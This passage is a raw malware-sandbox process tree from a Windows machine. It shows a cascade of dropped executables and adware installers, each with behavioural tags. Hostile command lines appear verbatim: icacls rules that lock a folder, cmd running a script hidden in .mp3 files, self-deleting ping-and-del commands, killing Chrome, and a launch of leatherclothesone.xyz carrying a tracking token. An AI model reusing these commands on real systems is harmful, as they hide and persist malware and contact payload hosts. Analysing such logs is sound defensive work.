                                                                                                                                                                                                                                          18⤵
                                                                                                                                                                                                                                            PID:7680
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
                                                                                                                                                                                                                                              19⤵
                                                                                                                                                                                                                                                PID:8400
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\WUFServices.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\WUFServices.exe"
                                                                                                                                                                                                                                                  20⤵
                                                                                                                                                                                                                                                    PID:6260
                                                                                                                                                                                                                                            • C:\Users\Admin\Videos\111.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\Videos\111.exe"
                                                                                                                                                                                                                                              17⤵
                                                                                                                                                                                                                                                PID:7368
                                                                                                                                                                                                                                                • C:\Users\Admin\Videos\111.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\Videos\111.exe"
                                                                                                                                                                                                                                                  18⤵
                                                                                                                                                                                                                                                    PID:8764
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "Admin:(R,REA,RA,RD)"
                                                                                                                                                                                                                                                      19⤵
                                                                                                                                                                                                                                                        PID:9184
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                          icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"
                                                                                                                                                                                                                                                          20⤵
                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                          PID:6764
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                          icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"
                                                                                                                                                                                                                                                          20⤵
                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                          PID:7028
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                          icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "Admin:(R,REA,RA,RD)"
                                                                                                                                                                                                                                                          20⤵
                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                          PID:5724
                                                                                                                                                                                                                                                  • C:\Users\Admin\Videos\Vickybuild.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\Videos\Vickybuild.exe"
                                                                                                                                                                                                                                                    17⤵
                                                                                                                                                                                                                                                      PID:4100
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\makecab.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\makecab.exe"
                                                                                                                                                                                                                                                        18⤵
                                                                                                                                                                                                                                                          PID:5496
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\makecab.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\makecab.exe"
                                                                                                                                                                                                                                                          18⤵
                                                                                                                                                                                                                                                            PID:7212
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\makecab.exe
                                                                                                                                                                                                                                                            "C:\Windows\System32\makecab.exe"
                                                                                                                                                                                                                                                            18⤵
                                                                                                                                                                                                                                                              PID:4572
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\makecab.exe
                                                                                                                                                                                                                                                              "C:\Windows\System32\makecab.exe"
                                                                                                                                                                                                                                                              18⤵
                                                                                                                                                                                                                                                                PID:6816
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\makecab.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\makecab.exe"
                                                                                                                                                                                                                                                                18⤵
                                                                                                                                                                                                                                                                  PID:7828
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\makecab.exe
                                                                                                                                                                                                                                                                  "C:\Windows\System32\makecab.exe"
                                                                                                                                                                                                                                                                  18⤵
                                                                                                                                                                                                                                                                    PID:5076
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\makecab.exe
                                                                                                                                                                                                                                                                    "C:\Windows\System32\makecab.exe"
                                                                                                                                                                                                                                                                    18⤵
                                                                                                                                                                                                                                                                      PID:6000
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Distrutta.mp3
                                                                                                                                                                                                                                                                      18⤵
                                                                                                                                                                                                                                                                        PID:9208
                                                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                          19⤵
                                                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                          PID:9148
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                          19⤵
                                                                                                                                                                                                                                                                            PID:9192
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                              findstr /V /R "^YNGHlhExSzslEWJWrMZhPQjfSqWRNvlCXrLShhuEbPCprUEacSOmXABiAdOldMGcpOjBlQJPFcQqgejXcEvVIKFbBDsWmWhKouZfIri$" Saluta.mp3
                                                                                                                                                                                                                                                                              20⤵
                                                                                                                                                                                                                                                                                PID:8188
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\sPiAfuTGyyVOZKeaLf\Uscio.exe.com
                                                                                                                                                                                                                                                                                Uscio.exe.com Q
                                                                                                                                                                                                                                                                                20⤵
                                                                                                                                                                                                                                                                                  PID:8680
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\sPiAfuTGyyVOZKeaLf\Uscio.exe.com
                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\sPiAfuTGyyVOZKeaLf\Uscio.exe.com Q
                                                                                                                                                                                                                                                                                    21⤵
                                                                                                                                                                                                                                                                                      PID:5492
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\sPiAfuTGyyVOZKeaLf\RegAsm.exe
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\sPiAfuTGyyVOZKeaLf\RegAsm.exe
                                                                                                                                                                                                                                                                                        22⤵
                                                                                                                                                                                                                                                                                          PID:8888
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                      ping 127.0.0.1 -n 30
                                                                                                                                                                                                                                                                                      20⤵
                                                                                                                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                                                                                                                      PID:2316
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" 1560 C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\RegAsm.exe"
                                                                                                                                                                                                                                                                                17⤵
                                                                                                                                                                                                                                                                                  PID:7080
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                    taskkill /F /PID 1560
                                                                                                                                                                                                                                                                                    18⤵
                                                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                                                    PID:5156
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                                                                    choice /C Y /N /D Y /T 3
                                                                                                                                                                                                                                                                                    18⤵
                                                                                                                                                                                                                                                                                      PID:6048
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                              ping 127.0.0.1 -n 30
                                                                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                                                                                                              PID:1228
                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\8mQGnEqONcmJ.exe
                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\8mQGnEqONcmJ.exe"
                                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                        PID:6480
                                                                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                            PID:6852
                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\JoSetp.exe
                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\JoSetp.exe"
                                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                          PID:6440
                                                                                                                                                                                                                                                                          • C:\ProgramData\6204097.exe
                                                                                                                                                                                                                                                                            "C:\ProgramData\6204097.exe"
                                                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            PID:7164
                                                                                                                                                                                                                                                                          • C:\ProgramData\6674885.exe
                                                                                                                                                                                                                                                                            "C:\ProgramData\6674885.exe"
                                                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                                                            PID:6056
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\uskx0eqwzh0\app.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\uskx0eqwzh0\app.exe" /8-23
                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                    PID:2316
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\uskx0eqwzh0\app.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\uskx0eqwzh0\app.exe" /8-23
                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                        PID:9184
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2316 -s 428
                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                        PID:7696
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\2rt2x5oqwn0\vpn.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\2rt2x5oqwn0\vpn.exe" /silent /subid=482
                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                      PID:5124
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-6BH2K.tmp\vpn.tmp
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-6BH2K.tmp\vpn.tmp" /SL5="$20356,15170975,270336,C:\Users\Admin\AppData\Local\Temp\2rt2x5oqwn0\vpn.exe" /silent /subid=482
                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                        PID:5252
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                            PID:6108
                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                                                                                                              tapinstall.exe remove tap0901
                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                              PID:5260
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                              PID:4508
                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                                                                                                                tapinstall.exe install OemVista.inf tap0901
                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                • Modifies system certificate store
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:6860
                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                              PID:8296
                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                PID:9148
                                                                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                                                                                  PID:4508
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\bbkxfn4fmvy\5jsmjjaahpi.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\bbkxfn4fmvy\5jsmjjaahpi.exe" /ustwo INSTALL
                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                            PID:4824
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4824 -s 652
                                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                              PID:6032
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4824 -s 668
                                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                              PID:6612
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4824 -s 716
                                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                              PID:6896
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4824 -s 696
                                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                              PID:7152
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4824 -s 884
                                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                              PID:5596
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4824 -s 976
                                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                              PID:5848
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4824 -s 1096
                                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                              PID:1972
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\elu03his5i1\toehjmrxpuy.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\elu03his5i1\toehjmrxpuy.exe" /quiet SILENT=1 AF=756
                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                                                                                                                            • Modifies system certificate store
                                                                                                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                            PID:5352
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\elu03his5i1\toehjmrxpuy.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\elu03his5i1\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617829697 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
                                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                                PID:4136
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\xfp2c1ntqs4\IBInstaller_97039.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\xfp2c1ntqs4\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                              PID:5484
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-5HREU.tmp\IBInstaller_97039.tmp
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-5HREU.tmp\IBInstaller_97039.tmp" /SL5="$303D8,10084460,721408,C:\Users\Admin\AppData\Local\Temp\xfp2c1ntqs4\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:5612
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  "cmd.exe" /c start http://leatherclothesone.xyz/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                                                                                                  PID:5684
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-2BLKR.tmp\{app}\vdi_compiler.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-2BLKR.tmp\{app}\vdi_compiler"
                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                  PID:5712
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-2BLKR.tmp\{app}\vdi_compiler.exe"
                                                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                                                      PID:4736
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                        ping localhost -n 4
                                                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                                                                                        PID:7328
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jmcvosfpi0m\setup_10.2_us3.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\jmcvosfpi0m\setup_10.2_us3.exe" /silent
                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                  PID:2272
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\98AQVPMJVU\setups.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\98AQVPMJVU\setups.exe" ll
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                            PID:1000
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-NKT0V.tmp\setups.tmp
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-NKT0V.tmp\setups.tmp" /SL5="$5016C,2051888,270336,C:\Users\Admin\AppData\Local\Temp\98AQVPMJVU\setups.exe" ll
                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                              PID:2124
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Version.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Version.exe"
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                          PID:2064
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                            "C:\Windows\System32\WScript.exe" "C:\Program Files\unins0000.vbs"
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                            PID:2940
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                              "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                              PID:1984
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                          • Modifies system certificate store
                                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                          PID:3612
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                              PID:4852
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                PID:5072
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            PID:3584
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe" >> NUL
                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                PID:4636
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                  ping 127.0.0.1
                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                  PID:1096
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                              PID:4400
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                              PID:6020
                                                                                                                                                                                                                                                                              • C:\ProgramData\8282273.exe
                                                                                                                                                                                                                                                                                "C:\ProgramData\8282273.exe"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                PID:4968
                                                                                                                                                                                                                                                                              • C:\ProgramData\5712474.exe
                                                                                                                                                                                                                                                                                "C:\ProgramData\5712474.exe"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                  PID:4508
                                                                                                                                                                                                                                                                                  • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                                                                                                                                    "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                                                                                                                                    6⤵
